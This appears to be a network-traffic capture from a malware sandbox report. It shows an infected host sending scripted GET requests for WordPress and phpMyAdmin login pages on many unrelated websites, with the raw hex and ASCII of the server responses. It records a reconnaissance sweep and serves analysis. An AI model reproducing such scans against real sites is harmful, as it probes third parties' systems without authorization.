                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.126712084 CET228OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: la-morada.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.317944050 CET346INHTTP/1.1 410 Gone
                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:29 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 39 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 6c 61 2d 6d 6f 72 61 64 61 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 7<html>9 <head>49 <meta http-equiv='refresh' content='0; url=http://la-morada.com/' />a </head>8</html>0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                115192.168.2.65618266.96.160.14480
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.132766008 CET235OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: jumpnsplashwear.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.246144056 CET314INHTTP/1.1 409 Conflict
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:29 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                Content-Length: 83
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Server: Apache/2
                                                                                                                                                                                                                                                                                                                Age: 0
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 68 75 6d 61 6e 73 5f 32 31 39 30 39 3d 31 22 3b 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 74 72 75 65 29 3c 2f 73 63 72 69 70 74 3e
                                                                                                                                                                                                                                                                                                                Data Ascii: <script>document.cookie = "humans_21909=1"; document.location.reload(true)</script>
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.248869896 CET282OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: jumpnsplashwear.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Referer: http://jumpnsplashwear.com/wp-login.php
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.376888037 CET1148INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:29 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Content-Length: 867
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Server: Apache/2
                                                                                                                                                                                                                                                                                                                Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                Age: 0
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                116192.168.2.65618366.96.160.14480
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.132807970 CET235OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: jumpnsplashwear.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.297271967 CET314INHTTP/1.1 409 Conflict
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:29 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                Content-Length: 83
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Server: Apache/2
                                                                                                                                                                                                                                                                                                                Age: 0
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 68 75 6d 61 6e 73 5f 32 31 39 30 39 3d 31 22 3b 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 74 72 75 65 29 3c 2f 73 63 72 69 70 74 3e
                                                                                                                                                                                                                                                                                                                Data Ascii: <script>document.cookie = "humans_21909=1"; document.location.reload(true)</script>
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.301148891 CET282OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: jumpnsplashwear.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Referer: http://jumpnsplashwear.com/wp-login.php
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.412226915 CET1188INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:29 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Content-Length: 867
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Server: Apache/2
                                                                                                                                                                                                                                                                                                                Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                Expires: Sat, 02 Dec 2023 01:09:39 GMT
                                                                                                                                                                                                                                                                                                                Age: 0
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                117192.168.2.65618864.71.33.3180
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.149466991 CET226OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: mcsmk8.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.287988901 CET514INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:29 GMT
                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.292951107 CET264OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: mcsmk8.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Referer: http://mcsmk8.com/wp-login.php
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.431278944 CET514INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:29 GMT
                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                118192.168.2.656186188.120.236.1880
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.225955963 CET227OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: eremina.net
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.441770077 CET1340INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/8.5
                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                Date: Fri, 01 Dec 2023 22:09:28 GMT
                                                                                                                                                                                                                                                                                                                Content-Length: 1245
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20
